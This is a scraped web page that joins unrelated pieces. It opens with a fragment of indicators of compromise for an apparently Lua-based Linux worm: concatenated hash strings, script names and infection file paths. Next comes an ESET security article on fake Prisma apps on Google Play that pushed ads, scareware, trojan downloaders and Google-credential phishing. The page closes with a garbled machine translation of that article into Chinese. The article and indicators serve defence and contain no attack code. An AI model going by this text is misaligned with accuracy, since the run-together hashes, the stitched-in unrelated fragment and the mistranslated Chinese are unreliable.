c6d47957732a8b0f5ef0f7d4e614c79ce4b3c92a96137e6215a5e2f5fd28a672eddaaabd8a5d9c4605b33bd47fedbad5a0da9928de6aa33f73022a4801e06d675e5c3011060242af7b949ad
SHA-1 hashes (.dl)
274181d2f9c6b8f0e217db23f1d39aa94c161d6e8abbb049bffd679686323160ca4b6a86184550a195444c2ccc5fff19145d60f1e817fd682cabe0cd9cde845852653339f67667c2408126f02f246949
Lua’s scripts filename
async.luaasync.lua.oldbencode.luabfssh.luabfssh.lua.old2bftelnet.luabtloader.luacallhome.luacallhome.lua.oldconfig.luacrypto.luadht.luaevent.luaevs.luahttp.luahttpproto.lualibevent2.lualuaevent.luamain.luamain2.luamalware.luapersist.luareadme.luarouting.luascanner.luascanner2.luaserver.luasocket.luasocks.luassh.luassl.luatelnet.luatest.luatest1.luatest10.luatest2.luatest3.luatest5.luatest6.luathreads.luatorrent.luaudp.luautils.luaworm.lua
Files that could potentially indicate an infection
/tmp/.local/*/tmp/drop/tmp/srv$HOME/.local/ssh.txt$HOME/.local/telnet.txt$HOME/.local/nodes.cfg$HOME/.local/check$HOME/.local/script.bt$HOME/.local/update.bt$HOME/.local/server.bt$HOME/.local/syslog$HOME/.local/syslog.pid$HOME/.local/{armv4l,i686,mips,mipsel}.{dl,dm}$HOME/.local/{armv4l,i686,mips,mipsel,powerpc}.lm
/etc/rc2.d/S04syslogd/etc/rc3.d/S04syslogd/etc/rc4.d/S04syslogd/etc/rc5.d/S04syslogd/etc/init.d/syslogd/bin/syslogd/etc/cron.hourly/syslogd

Fake Prisma apps found on Google Play在谷歌Play应用程序发现假帖

Before the release of the Android version of Prisma, a popular photo transformation app, fake Prisma apps flooded the Google Play Store.

ESET researchers discovered fake Prisma apps of different types, including several dangerous trojan downloaders. The Google Play security team removed them from the official Android store at ESET’s notice. Prior to that point, Prisma copycats reached over 1.5 million downloads by fans.

Prisma is a unique photo editor released by Prisma labs, Inc. First released for iOS, it received excellent ratings among users on iTunes, the Apple app store. Android users were eager for it and many couldn’t wait to see it on Google Play where Prisma’s release was scheduled for July 24th, 2016.

As with many other popular apps on Google Play in the past, fake versions flooded the store before the official release date, riding the wave of user impatience.

Fake Prism apps’ functionality

Most of the fake Prisma apps found on Google Play didn’t have any photo editing functionality; instead they only displayed ads or fake surveys, luring users into providing their personal information or subscribing to bogus (and costly) SMS services. Some actually had very basic photo editing functionality but mainly served the user a stream of pop-up ads or displayed scareware activity to persuade the user the device was infected with malware.

Fake apps

Figure 1: Scareware activity displayed after launch

The most dangerous fake Prisma apps found on Google Play before the (genuine) Prisma app release were the trojan downloaders detected by ESET asAndroid/TrojanDownloader.Agent.GY. Contrary to their counterparts with their annoying ads and surveys, these trojans work behind the scenes hiding their icons from the device.

They would send device information to the C&C server and on request, download additional modules and execute them. When we replicated this infiltration, the trojan downloaded and executed an additional module stealing sensitive information such as phone number, operator name, country name, language and so on. However, downloaded modules may have had different functionality implemented.

Among the five trojan downloaders discovered on Google Play, two have phishing functionality implemented that could probably be executed via the downloaded module. Displaying a fake request to update the device’s operating system to Android 6.0, users are lured into entering their Google account credentials into the fake login form.

Figure 2: Phishing activity

Figure 2: Phishing activity

Text translated:

Для обновления вашего устройства необходимо авторизоваться!

Ваша версия Android:

Доступная версия: 6.0

“To update your device, you must login!
Your version of Android:
Available version: 6.0”

Один аккаунт. Весь мир Google!

Подождите, идет проверка…”

“One account. Google whole world!

Wait, there is a check…”

Because of their download capabilities, theAndroid/TrojanDownloader.Agent.GYfamily of malware poses a serious risk to more than 10,000 Android users who installed these dangerous apps before they were pulled from the Google Play store.

Figure 3: Trojans found on Google Play

Figure 3: Trojans found on Google Play

Just before the release …

Because of Prisma’s success on the iOS platform, it was clear that this app would be eagerly awaited by Android users. Such situations often attract bad guys who put out fake apps – either copycats or various derivatives, from tutorials to cheats – on Google Play to ride the wave of excitement. Using misleading icons, app names, developer’s names and/or fake reviews, they make money from displaying ads, fake clicks, money scams … or, at worst, ransomware, delivered to the victim via a downloader trojan.

In the past, we’ve witnessed a lot of cases of apps riding the wave of popularity on Google Play. The latest examples werefakes of the Pokémon Go app. Also GTA 5 fans were targeted byfake appsbefore the famous game’s official release, and the same pattern was observed in connection with the popular MSQRD app that arrived with numerous copycats on the Google Play store. Many other popular apps – such as My Talking Angela, Dubsmash or Subway Surfers – were preceded bycopycat porn clickers.

Conclusion

Trying to download a popular app before its official release is a really bad idea as the chances of downloading a genuine app is slim while the risk of downloading a malicious copycat is large. This is true, even from Google Play, with all of the tech giant’s security mechanisms behind it. For users it’s difficult to determine whether a given app is genuine or not. Bad guys often use very similar icons, app names, subscriptions and even screenshots to confuse users.

对新的Android版本发布之前,一个流行的照片转换程序,假钻应用淹没了谷歌Play商店。

ESET研究人员发现假钻的应用程序的不同类型,包括一些危险的木马下载器。谷歌游戏安全小组拆除他们在ESET的通知官方的Android应用商店。这一点之前,PRISMA模仿者达到超过150万下载的球迷。

棱镜的棱镜实验室发布了一个独特的图片编辑器,公司首次发布的iOS,它得到了很好的收视用户在iTunes中,苹果应用程序商店。Android用户渴望它和许多迫不及待想看到它在谷歌播放,PRISMA的发布定于7月24日TH,2016。

与许多其他流行的应用程序在谷歌打了过去,假版本充斥着商店的正式发布日期之前,用户不耐烦骑波。

假棱镜应用程序的功能

大多数的假钻的应用程序发现在谷歌播放没有任何照片编辑功能;相反,他们只显示广告或假冒调查,诱骗用户提供自己的个人信息或订阅伪造的(昂贵的)短信服务。有些却很基本的照片编辑功能,主要是用户流的弹出式广告或显示恐吓活动说服用户设备被恶意软件感染。

Fake apps

图1:显示恐吓活动推出后

最危险的假钻的应用程序发现在谷歌播放前的(真正的)钻APP发布检测ESET的木马下载者Android / trojandownloader.agent.gy。相反,他们的同行和烦人的广告和调查,这些木马后面的工作从设备隐藏图标的场景。

他们将设备信息的C&C服务器和请求,下载额外的模块和执行。当我们复制这个浸润,木马下载并执行一个额外的模块,窃取敏感信息,如电话号码、运营商名称、国家名称、语言等。然而,下载模块可能有不同的功能实现。

五木马下载者在谷歌Play中发现,两个钓鱼功能的实现,可以通过下载模块。更新设备的操作系统Android 6显示一个虚假的请求,用户被引诱到他们的谷歌帐户凭据进入虚假的登录表单。

Figure 2: Phishing activity

图2:钓鱼活动

文本翻译:

更新您的设备需要重新登录,才能!

你的版本的Android:

可获得的版本:6.0

“更新你的设备,你必须登录!
你的Android版本:
可用的版本6.0”:

一个帐户。谷歌的整个世界!

等一等,去查…”

“一个账户。谷歌的整个世界!

等待,有一种检查…”

因为他们的下载功能,Android / trojandownloader.agent.gy家族的恶意软件造成的超过10000的Android用户安装了这些危险的应用程序之前,他们是从谷歌Play商店拉严重风险。

Figure 3: Trojans found on Google Play

图3:木马发现在谷歌播放

就在释放…

由于棱镜的成功在iOS平台上,很明显,这个程序可以通过Android用户期待已久的。这种情况常常吸引坏人把假的应用程序–要么模仿或各种衍生物,从教程秘籍–谷歌玩骑兴奋波。使用误导性的图标,应用程序名称,开发商的名称和/或虚假评论,他们从显示广告,虚假点击赚钱,钱诈骗…或者,在最坏的情况下,勒索,通过下载器木马传送到受害者。

在过去,我们已经目睹了很多例应用普及浪潮骑在谷歌播放。最新的例子fakes之博爱去应用程序。also GTA 5球迷were targeted by假的应用程序著名游戏的正式发布之前,和同样的模式是与流行的msqrd应用在谷歌Play商店众多模仿者到连接观察。许多流行的应用程序–如我说安吉拉,dubsmash或地铁冲浪者–之前模仿色情答题器

结论

尝试下载一个流行的应用程序在其官方发布,真是一个坏主意为下载正版APP是苗条而下载一个恶意模仿大风险的机会。这是真的,甚至从谷歌播放,所有的科技巨头的安全机制的背后。用户很难确定是否一个给定的应用程序是真正的或不。坏人经常使用非常相似的图标,应用程序名称,订阅甚至截图来迷惑用户。

Figure 4: Example of a fake app (right) mimicking the original (left)

图4:一个虚假的应用实例(右)模仿原(左)

专家建议:由ESET

遵循“Android应用卫生最基本的规则”:

  • 只从有信誉的来源下载
  • 查看用户评论和负面评论的焦点(记住,积极的人会制作)
  • 阅读程序的条款和条件,注重权限
  • 使用高质量的移动安全解决方案

当周围有你想要的APP炒作,然后还要考虑以下建议:

  • 也许,你会面对模仿者随着原程序,比平常更加小心
  • 彻底检查应用程序的名称和开发商的名称–必须完全适合,不仅像你所期待的